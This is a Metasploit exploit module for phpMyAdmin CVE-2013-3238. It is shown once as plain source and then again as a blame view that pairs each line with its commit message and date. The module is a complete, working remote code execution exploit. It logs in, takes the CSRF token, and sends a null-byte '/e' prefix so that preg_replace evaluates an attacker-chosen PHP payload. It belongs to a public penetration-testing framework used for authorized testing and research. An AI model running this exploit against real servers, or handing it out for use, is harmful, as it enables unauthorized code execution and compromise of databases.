metasploit-framework/modules/exploits/multi/http/phpmyadmin_preg_replace.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name' => 'phpMyAdmin Authenticated Remote Code Execution via preg_replace()',
			'Description' => %q{
					This module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's
					replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php
					This affects versions 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3.
					PHP versions > 5.4.6 are not vulnerable.
			},
			'Author' =>
				[
					'Janek "waraxe" Vind', # Discovery
					'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module
				],
			'License' => MSF_LICENSE,
			'References' =>
				[
					[ 'CVE', '2013-3238' ],
					[ 'PMASA', '2013-2'],
					[ 'waraxe', '2013-SA#103' ],
					[ 'EDB', '25003'],
					[ 'OSVDB', '92793'],
					[ 'URL', 'http://www.waraxe.us/advisory-103.html' ],
					[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php' ]
				],
			'Privileged' => false,
			'Platform'   => ['php'],
			'Arch'       => ARCH_PHP,
			'Payload'    =>
				{
					'BadChars' => "&\n=+%",
					# Clear out PMA's error handler so it doesn't lose its mind
					# and cause ENOMEM errors and segfaults in the destructor.
					'Prepend' => "function foo($a,$b,$c,$d,$e){return true;};set_error_handler(foo);"
				},
			'Targets' =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Apr 25 2013'))

		register_options(
			[
				OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
				OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),
				OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
			], self.class)
	end

	def check
		begin
			res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/js/messages.php') })
		rescue
			print_error("Unable to connect to server.")
			return CheckCode::Unknown
		end

		if res.code != 200
			print_error("Unable to query /js/messages.php")
			return CheckCode::Unknown
		end

		php_version = res['X-Powered-By']
		if php_version
			print_status("PHP Version: #{php_version}")
			if php_version =~ /PHP\/(\d)\.(\d)\.(\d)/
				if $1.to_i > 5
					return CheckCode::Safe
				else
					if $1.to_i == 5 and $2.to_i > 4
						return CheckCode::Safe
					else
						if $1.to_i == 5 and $2.to_i == 4 and $3.to_i > 6
							return CheckCode::Safe
						end
					end
				end
			end
		else
			print_status("Unknown PHP Version")
		end

		if res.body =~ /pmaversion = '(.*)';/
			print_status("phpMyAdmin version: #{$1}")
			case $1.downcase
				when '3.5.8.1', '4.0.0-rc3'
					return CheckCode::Safe
				when '4.0.0-alpha1', '4.0.0-alpha2', '4.0.0-beta1', '4.0.0-beta2', '4.0.0-beta3', '4.0.0-rc1', '4.0.0-rc2'
					return CheckCode::Vulnerable
				else
					if $1.starts_with? '3.5.'
						return CheckCode::Vulnerable
					end

					return CheckCode::Unknown
			end
		end
	end

	def exploit
		uri = target_uri.path
		print_status("Grabbing CSRF token...")
		response = send_request_cgi({ 'uri' => uri})
		if response.nil?
			fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.")
		end

		if (response.body !~ /"token"\s*value="([^"]*)"/)
			fail_with(Exploit::Failure::NotFound, "Couldn't find token. Is URI set correctly?")
		else
			print_good("Retrieved token")
		end

		token = $1
		post = {
			'token' => token,
			'pma_username' => datastore['USERNAME'],
			'pma_password' => datastore['PASSWORD']
		}

		print_status("Authenticating...")

		login = send_request_cgi({
			'method' => 'POST',
			'uri' => normalize_uri(uri, 'index.php'),
			'vars_post' => post
		})

		if login.nil?
			fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.")
		end

		token = login.headers['Location'].scan(/token=(.*)[&|$]/).flatten.first

		cookies = login.get_cookies

		login_check = send_request_cgi({
			'uri' => normalize_uri(uri, 'index.php'),
			'vars_get' => { 'token' => token },
			'cookie' => cookies
		})

		if login_check.body =~ /Welcome to/
			fail_with(Exploit::Failure::NoAccess, "Authentication failed.")
		else
			print_good("Authentication successful")
		end

		db = rand_text_alpha(3+rand(3))
		exploit_result = send_request_cgi({
			'uri'	=> normalize_uri(uri, 'db_structure.php'),
			'method' => 'POST',
			'cookie' => cookies,
			'vars_post' => {
				'query_type' => 'replace_prefix_tbl',
				'db' => db,
				'selected[0]' => db,
				'token' => token,
				'from_prefix' => "/e\0",
				'to_prefix' => payload.encoded,
				'mult_btn' => 'Yes'
			}
		},1)
	end
end
Initial attempt lfi 2013-04-26 13:32:18 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info = {})`
			`super(update_info(info,`
Add pma url 2013-04-26 22:37:26 +00:00			`'Name' => 'phpMyAdmin Authenticated Remote Code Execution via preg_replace()',`
Clear out PMA's error handler * Add an error_handler function that just returns true. This prevents eventual ENOMEM errors and segfaults like these: [Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156 [Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11) * clean up some whitespace 2013-04-26 20:12:58 +00:00			`'Description' => %q{`
Add php version to check 2013-04-26 22:58:08 +00:00			`This module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's`
			`replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php`
			`This affects versions 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3.`
			`PHP versions > 5.4.6 are not vulnerable.`
Initial attempt lfi 2013-04-26 13:32:18 +00:00			`},`
Clear out PMA's error handler * Add an error_handler function that just returns true. This prevents eventual ENOMEM errors and segfaults like these: [Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156 [Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11) * clean up some whitespace 2013-04-26 20:12:58 +00:00			`'Author' =>`
Initial attempt lfi 2013-04-26 13:32:18 +00:00			`[`
			`'Janek "waraxe" Vind', # Discovery`
Final tidyup 2013-04-26 14:41:28 +00:00			`'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module`
Initial attempt lfi 2013-04-26 13:32:18 +00:00			`],`
Clear out PMA's error handler * Add an error_handler function that just returns true. This prevents eventual ENOMEM errors and segfaults like these: [Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156 [Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11) * clean up some whitespace 2013-04-26 20:12:58 +00:00			`'License' => MSF_LICENSE,`
			`'References' =>`
Initial attempt lfi 2013-04-26 13:32:18 +00:00			`[`
Final tidyup 2013-04-26 14:41:28 +00:00			`[ 'CVE', '2013-3238' ],`
			`[ 'PMASA', '2013-2'],`
			`[ 'waraxe', '2013-SA#103' ],`
Add refs and use targeturi 2013-04-27 09:35:49 +00:00			`[ 'EDB', '25003'],`
			`[ 'OSVDB', '92793'],`
Final tidyup 2013-04-26 14:41:28 +00:00			`[ 'URL', 'http://www.waraxe.us/advisory-103.html' ],`
Add pma url 2013-04-26 22:37:26 +00:00			`[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php' ]`
Initial attempt lfi 2013-04-26 13:32:18 +00:00			`],`
Clear out PMA's error handler * Add an error_handler function that just returns true. This prevents eventual ENOMEM errors and segfaults like these: [Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156 [Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11) * clean up some whitespace 2013-04-26 20:12:58 +00:00			`'Privileged' => false,`
			`'Platform' => ['php'],`
			`'Arch' => ARCH_PHP,`
			`'Payload' =>`
Initial attempt lfi 2013-04-26 13:32:18 +00:00			`{`
Change to send_rq_cgi 2013-04-26 18:19:11 +00:00			`'BadChars' => "&\n=+%",`
Clear out PMA's error handler * Add an error_handler function that just returns true. This prevents eventual ENOMEM errors and segfaults like these: [Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156 [Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11) * clean up some whitespace 2013-04-26 20:12:58 +00:00			`# Clear out PMA's error handler so it doesn't lose its mind`
			`# and cause ENOMEM errors and segfaults in the destructor.`
			`'Prepend' => "function foo($a,$b,$c,$d,$e){return true;};set_error_handler(foo);"`
Final tidyup 2013-04-26 14:41:28 +00:00			`},`
Clear out PMA's error handler * Add an error_handler function that just returns true. This prevents eventual ENOMEM errors and segfaults like these: [Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156 [Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11) * clean up some whitespace 2013-04-26 20:12:58 +00:00			`'Targets' =>`
Initial attempt lfi 2013-04-26 13:32:18 +00:00			`[`
Final tidyup 2013-04-26 14:41:28 +00:00			`[ 'Automatic', { } ],`
Initial attempt lfi 2013-04-26 13:32:18 +00:00			`],`
			`'DefaultTarget' => 0,`
Final tidyup 2013-04-26 14:41:28 +00:00			`'DisclosureDate' => 'Apr 25 2013'))`
Initial attempt lfi 2013-04-26 13:32:18 +00:00
			`register_options(`
			`[`
Whitespace and change default user 2013-04-27 09:39:27 +00:00			`OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),`
			`OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),`
Initial attempt lfi 2013-04-26 13:32:18 +00:00			`OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])`
			`], self.class)`
			`end`

			`def check`
Final tidyup 2013-04-26 14:41:28 +00:00			`begin`
Add refs and use targeturi 2013-04-27 09:35:49 +00:00			`res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/js/messages.php') })`
Final tidyup 2013-04-26 14:41:28 +00:00			`rescue`
			`print_error("Unable to connect to server.")`
			`return CheckCode::Unknown`
			`end`
Initial attempt lfi 2013-04-26 13:32:18 +00:00
Final tidyup 2013-04-26 14:41:28 +00:00			`if res.code != 200`
			`print_error("Unable to query /js/messages.php")`
			`return CheckCode::Unknown`
			`end`
Initial attempt lfi 2013-04-26 13:32:18 +00:00
Add php version to check 2013-04-26 22:58:08 +00:00			`php_version = res['X-Powered-By']`
			`if php_version`
			`print_status("PHP Version: #{php_version}")`
			`if php_version =~ /PHP\/(\d)\.(\d)\.(\d)/`
			`if $1.to_i > 5`
			`return CheckCode::Safe`
			`else`
			`if $1.to_i == 5 and $2.to_i > 4`
			`return CheckCode::Safe`
			`else`
			`if $1.to_i == 5 and $2.to_i == 4 and $3.to_i > 6`
			`return CheckCode::Safe`
			`end`
			`end`
			`end`
			`end`
Add php version to check 2013-04-26 22:59:49 +00:00			`else`
			`print_status("Unknown PHP Version")`
Add php version to check 2013-04-26 22:58:08 +00:00			`end`

Final tidyup 2013-04-26 14:41:28 +00:00			`if res.body =~ /pmaversion = '(.*)';/`
Add php version to check 2013-04-26 22:58:08 +00:00			`print_status("phpMyAdmin version: #{$1}")`
Final tidyup 2013-04-26 14:41:28 +00:00			`case $1.downcase`
			`when '3.5.8.1', '4.0.0-rc3'`
			`return CheckCode::Safe`
			`when '4.0.0-alpha1', '4.0.0-alpha2', '4.0.0-beta1', '4.0.0-beta2', '4.0.0-beta3', '4.0.0-rc1', '4.0.0-rc2'`
			`return CheckCode::Vulnerable`
			`else`
			`if $1.starts_with? '3.5.'`
			`return CheckCode::Vulnerable`
			`end`

			`return CheckCode::Unknown`
			`end`
Initial attempt lfi 2013-04-26 13:32:18 +00:00			`end`
			`end`

			`def exploit`
Add refs and use targeturi 2013-04-27 09:35:49 +00:00			`uri = target_uri.path`
Correct phpMyAdmin 2013-04-26 22:38:27 +00:00			`print_status("Grabbing CSRF token...")`
Initial attempt lfi 2013-04-26 13:32:18 +00:00			`response = send_request_cgi({ 'uri' => uri})`
			`if response.nil?`
			`fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.")`
			`end`

			`if (response.body !~ /"token"\svalue="([^"])"/)`
Fix auth check and cookie handling 2013-04-26 16:10:24 +00:00			`fail_with(Exploit::Failure::NotFound, "Couldn't find token. Is URI set correctly?")`
Initial attempt lfi 2013-04-26 13:32:18 +00:00			`else`
			`print_good("Retrieved token")`
			`end`

			`token = $1`
			`post = {`
			`'token' => token,`
			`'pma_username' => datastore['USERNAME'],`
			`'pma_password' => datastore['PASSWORD']`
			`}`

			`print_status("Authenticating...")`

			`login = send_request_cgi({`
			`'method' => 'POST',`
Add refs and use targeturi 2013-04-27 09:35:49 +00:00			`'uri' => normalize_uri(uri, 'index.php'),`
Initial attempt lfi 2013-04-26 13:32:18 +00:00			`'vars_post' => post`
			`})`

			`if login.nil?`
			`fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.")`
			`end`

			`token = login.headers['Location'].scan(/token=(.*)[&\|$]/).flatten.first`

Tidyup and getcookies 2013-04-26 19:26:04 +00:00			`cookies = login.get_cookies`
Fix auth check and cookie handling 2013-04-26 16:10:24 +00:00
			`login_check = send_request_cgi({`
Add refs and use targeturi 2013-04-27 09:35:49 +00:00			`'uri' => normalize_uri(uri, 'index.php'),`
Fix auth check and cookie handling 2013-04-26 16:10:24 +00:00			`'vars_get' => { 'token' => token },`
Tidyup and getcookies 2013-04-26 19:26:04 +00:00			`'cookie' => cookies`
Fix auth check and cookie handling 2013-04-26 16:10:24 +00:00			`})`

			`if login_check.body =~ /Welcome to/`
			`fail_with(Exploit::Failure::NoAccess, "Authentication failed.")`
			`else`
			`print_good("Authentication successful")`
Initial attempt lfi 2013-04-26 13:32:18 +00:00			`end`

Final tidyup 2013-04-26 14:41:28 +00:00			`db = rand_text_alpha(3+rand(3))`
Change to send_rq_cgi 2013-04-26 18:19:11 +00:00			`exploit_result = send_request_cgi({`
Add refs and use targeturi 2013-04-27 09:35:49 +00:00			`'uri' => normalize_uri(uri, 'db_structure.php'),`
Change to send_rq_cgi 2013-04-26 18:19:11 +00:00			`'method' => 'POST',`
Tidyup and getcookies 2013-04-26 19:26:04 +00:00			`'cookie' => cookies,`
Change to send_rq_cgi 2013-04-26 18:19:11 +00:00			`'vars_post' => {`
			`'query_type' => 'replace_prefix_tbl',`
			`'db' => db,`
			`'selected[0]' => db,`
			`'token' => token,`
			`'from_prefix' => "/e\0",`
			`'to_prefix' => payload.encoded,`
			`'mult_btn' => 'Yes'`
			`}`
			`},1)`
Initial attempt lfi 2013-04-26 13:32:18 +00:00			`end`
			`end`